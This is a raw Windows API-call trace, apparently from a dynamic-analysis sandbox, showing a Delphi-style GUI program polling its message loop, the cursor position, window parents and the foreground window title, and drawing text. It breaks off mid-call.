[0281.821] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0281.821] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0281.821] WindowFromPoint (Point=0x594) returned 0x100cc [0281.821] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.821] GetCurrentProcessId () returned 0x470 [0281.822] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.822] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0281.822] GetParent (hWnd=0x100cc) returned 0x100ca [0281.822] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.822] GetCurrentProcessId () returned 0x470 [0281.822] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.822] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0281.822] GetParent (hWnd=0x100ca) returned 0x100c6 [0281.822] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.822] GetCurrentProcessId () returned 0x470 [0281.822] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.822] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0281.822] GetParent (hWnd=0x100c6) returned 0x0 [0281.822] IsWindowVisible (hWnd=0x10134) returned 1 [0281.822] IsWindowEnabled (hWnd=0x10134) returned 1 [0281.822] GetCurrentThreadId () returned 0x62c [0281.822] ResetEvent (hEvent=0x6f8) returned 1 [0281.822] GetCurrentThreadId () returned 0x62c [0281.822] GetCurrentThreadId () returned 0x62c [0281.822] GetCurrentThreadId () returned 0x62c [0281.822] WaitMessage () returned 1 [0281.823] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0281.823] DefWindowProcW (hWnd=0x10110, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x10027 [0281.823] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0281.823] WindowFromPoint (Point=0x594) returned 0x100cc [0281.823] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.823] GetCurrentProcessId () returned 0x470 [0281.823] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.823] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0281.823] GetParent (hWnd=0x100cc) returned 0x100ca [0281.823] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.823] GetCurrentProcessId () returned 0x470 [0281.823] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.823] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0281.823] GetParent (hWnd=0x100ca) returned 0x100c6 [0281.823] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.823] GetCurrentProcessId () returned 0x470 [0281.823] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.823] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0281.824] GetParent (hWnd=0x100c6) returned 0x0 [0281.824] IsWindowVisible (hWnd=0x10134) returned 1 [0281.824] IsWindowEnabled (hWnd=0x10134) returned 1 [0281.824] GetCurrentThreadId () returned 0x62c [0281.824] ResetEvent (hEvent=0x6f8) returned 1 [0281.824] GetCurrentThreadId () returned 0x62c [0281.824] GetCurrentThreadId () returned 0x62c [0281.824] GetCurrentThreadId () returned 0x62c [0281.824] WaitMessage () returned 1 [0281.824] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0281.824] DefWindowProcW (hWnd=0x10110, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x1013b [0281.824] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0281.824] WindowFromPoint (Point=0x594) returned 0x100cc [0281.824] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.824] GetCurrentProcessId () returned 0x470 [0281.824] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.824] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0281.824] GetParent (hWnd=0x100cc) returned 0x100ca [0281.824] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.824] GetCurrentProcessId () returned 0x470 [0281.824] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.825] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0281.825] GetParent (hWnd=0x100ca) returned 0x100c6 [0281.825] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.825] GetCurrentProcessId () returned 0x470 [0281.825] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.825] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0281.825] GetParent (hWnd=0x100c6) returned 0x0 [0281.825] IsWindowVisible (hWnd=0x10134) returned 1 [0281.825] IsWindowEnabled (hWnd=0x10134) returned 1 [0281.825] GetCurrentThreadId () returned 0x62c [0281.825] ResetEvent (hEvent=0x6f8) returned 1 [0281.825] GetCurrentThreadId () returned 0x62c [0281.825] GetCurrentThreadId () returned 0x62c [0281.825] GetCurrentThreadId () returned 0x62c [0281.825] WaitMessage () returned 1 [0281.825] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0281.825] DefWindowProcW (hWnd=0x10110, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0281.825] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0281.825] WindowFromPoint (Point=0x594) returned 0x100cc [0281.825] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.825] GetCurrentProcessId () returned 0x470 [0281.825] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.826] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0281.826] GetParent (hWnd=0x100cc) returned 0x100ca [0281.826] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.826] GetCurrentProcessId () returned 0x470 [0281.826] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.826] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0281.826] GetParent (hWnd=0x100ca) returned 0x100c6 [0281.826] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.826] GetCurrentProcessId () returned 0x470 [0281.826] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.826] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0281.826] GetParent (hWnd=0x100c6) returned 0x0 [0281.826] IsWindowVisible (hWnd=0x10134) returned 1 [0281.826] IsWindowEnabled (hWnd=0x10134) returned 1 [0281.826] GetCurrentThreadId () returned 0x62c [0281.826] ResetEvent (hEvent=0x6f8) returned 1 [0281.826] GetCurrentThreadId () returned 0x62c [0281.826] GetCurrentThreadId () returned 0x62c [0281.826] GetCurrentThreadId () returned 0x62c [0281.826] WaitMessage () returned 1 [0281.892] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0281.892] IsWindowUnicode (hWnd=0x10110) returned 1 [0281.892] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0281.893] GetCapture () returned 0x0 [0281.893] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0281.893] GetCurrentProcessId () returned 0x470 [0281.893] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.893] GetPropW (hWnd=0x10110, lpString=0xc02f) returned 0x0 [0281.893] GetParent (hWnd=0x10110) returned 0x0 [0281.893] TranslateMessage (lpMsg=0x534f944) returned 0 [0281.893] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0281.893] DefWindowProcW (hWnd=0x10110, Msg=0xc08c, wParam=0x0, lParam=0x0) returned 0x0 [0281.893] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0281.893] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0281.893] WindowFromPoint (Point=0x594) returned 0x100cc [0281.893] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.893] GetCurrentProcessId () returned 0x470 [0281.893] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.893] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0281.893] GetParent (hWnd=0x100cc) returned 0x100ca [0281.893] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.893] GetCurrentProcessId () returned 0x470 [0281.893] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.893] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0281.893] GetParent (hWnd=0x100ca) returned 0x100c6 [0281.893] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0281.893] GetCurrentProcessId () returned 0x470 [0281.893] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.894] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0281.894] GetParent (hWnd=0x100c6) returned 0x0 [0281.894] IsWindowVisible (hWnd=0x10134) returned 1 [0281.894] IsWindowEnabled (hWnd=0x10134) returned 1 [0281.894] GetCurrentThreadId () returned 0x62c [0281.894] ResetEvent (hEvent=0x6f8) returned 1 [0281.894] GetCurrentThreadId () returned 0x62c [0281.894] GetCurrentThreadId () returned 0x62c [0281.894] GetCurrentThreadId () returned 0x62c [0281.894] WaitMessage () returned 1 [0282.121] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0282.121] IsWindowUnicode (hWnd=0x1013a) returned 1 [0282.121] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0282.121] GetCapture () returned 0x0 [0282.121] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0282.121] GetCurrentProcessId () returned 0x470 [0282.121] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.121] GetPropW (hWnd=0x1013a, lpString=0xc02f) returned 0x0 [0282.121] GetParent (hWnd=0x1013a) returned 0x1010e [0282.121] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0282.121] GetCurrentProcessId () returned 0x470 [0282.121] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.121] GetPropW (hWnd=0x1010e, lpString=0xc02f) returned 0x0 [0282.121] GetParent (hWnd=0x1010e) returned 0x10134 [0282.121] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0282.121] GetCurrentProcessId () returned 0x470 [0282.121] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.121] GetPropW (hWnd=0x10134, lpString=0xc02f) returned 0x62f13c0 [0282.121] TranslateMessage (lpMsg=0x534f944) returned 0 [0282.121] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0282.121] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0282.121] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0282.121] WindowFromPoint (Point=0x594) returned 0x100cc [0282.121] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0282.122] GetCurrentProcessId () returned 0x470 [0282.122] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.122] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0282.122] GetParent (hWnd=0x100cc) returned 0x100ca [0282.122] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0282.122] GetCurrentProcessId () returned 0x470 [0282.122] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.122] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0282.122] GetParent (hWnd=0x100ca) returned 0x100c6 [0282.122] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0282.122] GetCurrentProcessId () returned 0x470 [0282.122] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.122] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0282.122] GetParent (hWnd=0x100c6) returned 0x0 [0282.122] IsWindowVisible (hWnd=0x10134) returned 1 [0282.122] IsWindowEnabled (hWnd=0x10134) returned 1 [0282.122] GetCurrentThreadId () returned 0x62c [0282.122] ResetEvent (hEvent=0x6f8) returned 1 [0282.122] GetCurrentThreadId () returned 0x62c [0282.122] GetCurrentThreadId () returned 0x62c [0282.122] GetCurrentThreadId () returned 0x62c [0282.122] WaitMessage () returned 1 [0282.707] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0282.707] IsWindowUnicode (hWnd=0x10114) returned 1 [0282.707] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0282.707] GetCapture () returned 0x0 [0282.707] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0282.707] GetCurrentProcessId () returned 0x470 [0282.707] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.707] GetPropW (hWnd=0x10114, lpString=0xc02f) returned 0x0 [0282.707] GetParent (hWnd=0x10114) returned 0x0 [0282.707] TranslateMessage (lpMsg=0x534f944) returned 0 [0282.707] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0282.707] GetForegroundWindow () returned 0x10134 [0282.707] SendMessageW (hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0282.707] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0282.707] GetCurrentThreadId () returned 0x62c [0282.707] GetCurrentThreadId () returned 0x62c [0282.707] GetCurrentThreadId () returned 0x62c [0282.708] GetCurrentThreadId () returned 0x62c [0282.708] GetCurrentThreadId () returned 0x62c [0282.708] GetCurrentThreadId () returned 0x62c [0282.708] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0282.708] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0282.708] IsWindowUnicode (hWnd=0x10126) returned 1 [0282.708] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0282.708] GetCapture () returned 0x0 [0282.708] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0282.708] GetCurrentProcessId () returned 0x470 [0282.708] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.708] GetPropW (hWnd=0x10126, lpString=0xc02f) returned 0x0 [0282.708] GetParent (hWnd=0x10126) returned 0x0 [0282.708] TranslateMessage (lpMsg=0x534f944) returned 0 [0282.708] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0282.708] ShowWindow (hWnd=0x10110, nCmdShow=0) returned 1 [0282.708] DefWindowProcW (hWnd=0x10110, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0282.708] DefWindowProcW (hWnd=0x10110, Msg=0x46, wParam=0x0, lParam=0x534f794) returned 0x0 [0282.711] DefWindowProcW (hWnd=0x10110, Msg=0x47, wParam=0x0, lParam=0x534f794) returned 0x0 [0282.712] KillTimer (hWnd=0x10126, uIDEvent=0x1) returned 1 [0282.712] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0282.712] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0282.712] WindowFromPoint (Point=0x594) returned 0x100cc [0282.712] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0282.712] GetCurrentProcessId () returned 0x470 [0282.712] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.712] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0282.712] GetParent (hWnd=0x100cc) returned 0x100ca [0282.713] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0282.713] GetCurrentProcessId () returned 0x470 [0282.713] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.713] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0282.714] GetParent (hWnd=0x100ca) returned 0x100c6 [0282.714] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0282.714] GetCurrentProcessId () returned 0x470 [0282.714] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0282.714] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0282.714] GetParent (hWnd=0x100c6) returned 0x0 [0282.714] IsWindowVisible (hWnd=0x10134) returned 1 [0282.714] IsWindowEnabled (hWnd=0x10134) returned 1 [0282.714] GetCurrentThreadId () returned 0x62c [0282.714] ResetEvent (hEvent=0x6f8) returned 1 [0282.714] GetCurrentThreadId () returned 0x62c [0282.714] GetCurrentThreadId () returned 0x62c [0282.714] GetCurrentThreadId () returned 0x62c [0282.714] WaitMessage () returned 1 [0283.553] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0283.553] IsWindowUnicode (hWnd=0x10112) returned 1 [0283.553] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0283.553] GetCapture () returned 0x0 [0283.553] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0283.553] GetCurrentProcessId () returned 0x470 [0283.553] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0283.553] GetPropW (hWnd=0x10112, lpString=0xc02f) returned 0x0 [0283.553] GetParent (hWnd=0x10112) returned 0x0 [0283.553] TranslateMessage (lpMsg=0x534f944) returned 0 [0283.553] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0283.553] GetForegroundWindow () returned 0x10134 [0283.553] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0283.553] GetWindowTextW (in: hWnd=0x10134, lpString=0x534f5b0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0283.553] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0283.554] GetCurrentThreadId () returned 0x62c [0283.554] GetCurrentThreadId () returned 0x62c [0283.554] GetCurrentThreadId () returned 0x62c [0283.554] GetCurrentThreadId () returned 0x62c [0283.554] GetCurrentThreadId () returned 0x62c [0283.554] GetCurrentThreadId () returned 0x62c [0283.554] GetLocalTime (in: lpSystemTime=0x534f3d4 | out: lpSystemTime=0x534f3d4*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0xa, wMinute=0x0, wSecond=0x6, wMilliseconds=0x2f2)) [0283.554] InvalidateRect (hWnd=0x10134, lpRect=0x534f24c, bErase=1) returned 1 [0283.554] GetDC (hWnd=0x0) returned 0x40101b8 [0283.554] MoveToEx (in: hdc=0x40101b8, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0283.554] SelectObject (hdc=0x40101b8, h=0xb0a0227) returned 0x18a002e [0283.554] GetSysColor (nIndex=8) returned 0x0 [0283.554] SetTextColor (hdc=0x40101b8, color=0x0) returned 0x0 [0283.554] SelectObject (hdc=0x40101b8, h=0x830021e) returned 0x1b00017 [0283.554] SetROP2 (hdc=0x40101b8, rop2=13) returned 13 [0283.554] UnrealizeObject (h=0xc100741) returned 1 [0283.554] SelectObject (hdc=0x40101b8, h=0xc100741) returned 0x1900010 [0283.554] SetBkColor (hdc=0x40101b8, color=0xffffff) returned 0xffffff [0283.554] SetBkMode (hdc=0x40101b8, mode=2) returned 2 [0283.554] GetSysColor (nIndex=8) returned 0x0 [0283.554] GetSysColor (nIndex=14) returned 0xffffff [0283.554] DrawThemeTextEx () returned 0x0 [0283.555] SelectObject (hdc=0x40101b8, h=0x1b00017) returned 0x830021e [0283.555] SelectObject (hdc=0x40101b8, h=0x1900015) returned 0xc100741 [0283.555] SelectObject (hdc=0x40101b8, h=0x18a002e) returned 0xb0a0227 [0283.555] GetCurrentPositionEx (in: hdc=0x40101b8, lppt=0x534f21c | out: lppt=0x534f21c) returned 1 [0283.555] ReleaseDC (hWnd=0x0, hDC=0x40101b8) returned 1 [0283.555] InvalidateRect (hWnd=0x10134, lpRect=0x534f208, bErase=1) returned 1 [0283.555] InvalidateRect (hWnd=0x10134, lpRect=0x534f204, bErase=1) returned 1 [0283.555] IsIconic (hWnd=0x10134) returned 0 [0283.555] GetClientRect (in: hWnd=0x10134, lpRect=0x534f200 | out: lpRect=0x534f200) returned 1 [0283.555] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0283.555] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0283.555] WindowFromPoint (Point=0x594) returned 0x100cc [0283.555] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0283.555] GetCurrentProcessId () returned 0x470 [0283.555] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0283.555] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0283.555] GetParent (hWnd=0x100cc) returned 0x100ca [0283.555] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0283.555] GetCurrentProcessId () returned 0x470 [0283.555] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0283.556] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0283.556] GetParent (hWnd=0x100ca) returned 0x100c6 [0283.556] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0283.556] GetCurrentProcessId () returned 0x470 [0283.556] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0283.556] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0283.556] GetParent (hWnd=0x100c6) returned 0x0 [0283.556] IsWindowVisible (hWnd=0x10134) returned 1 [0283.556] IsWindowEnabled (hWnd=0x10134) returned 1 [0283.556] GetCurrentThreadId () returned 0x62c [0283.556] ResetEvent (hEvent=0x6f8) returned 1 [0283.556] GetCurrentThreadId () returned 0x62c [0283.556] GetCurrentThreadId () returned 0x62c [0283.556] GetCurrentThreadId () returned 0x62c [0283.556] WaitMessage () returned 1 [0283.695] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0283.695] IsWindowUnicode (hWnd=0x10114) returned 1 [0283.695] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0283.695] GetCapture () returned 0x0 [0283.696] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0283.696] GetCurrentProcessId () returned 0x470 [0283.696] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0283.696] GetPropW (hWnd=0x10114, lpString=0xc02f) returned 0x0 [0283.696] GetParent (hWnd=0x10114) returned 0x0 [0283.696] TranslateMessage (lpMsg=0x534f944) returned 0 [0283.696] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0283.696] GetForegroundWindow () returned 0x10134 [0283.696] SendMessageW (hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0283.696] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0283.696] GetCurrentThreadId () returned 0x62c [0283.696] GetCurrentThreadId () returned 0x62c [0283.696] GetCurrentThreadId () returned 0x62c [0283.696] GetCurrentThreadId () returned 0x62c [0283.696] GetCurrentThreadId () returned 0x62c [0283.696] GetCurrentThreadId () returned 0x62c [0283.696] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0283.696] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0283.696] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0283.696] WindowFromPoint (Point=0x594) returned 0x100cc [0283.696] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0283.696] GetCurrentProcessId () returned 0x470 [0283.696] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0283.697] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0283.697] GetParent (hWnd=0x100cc) returned 0x100ca [0283.697] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0283.697] GetCurrentProcessId () returned 0x470 [0283.697] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0283.697] GetPropW (hWnd=0x100ca, 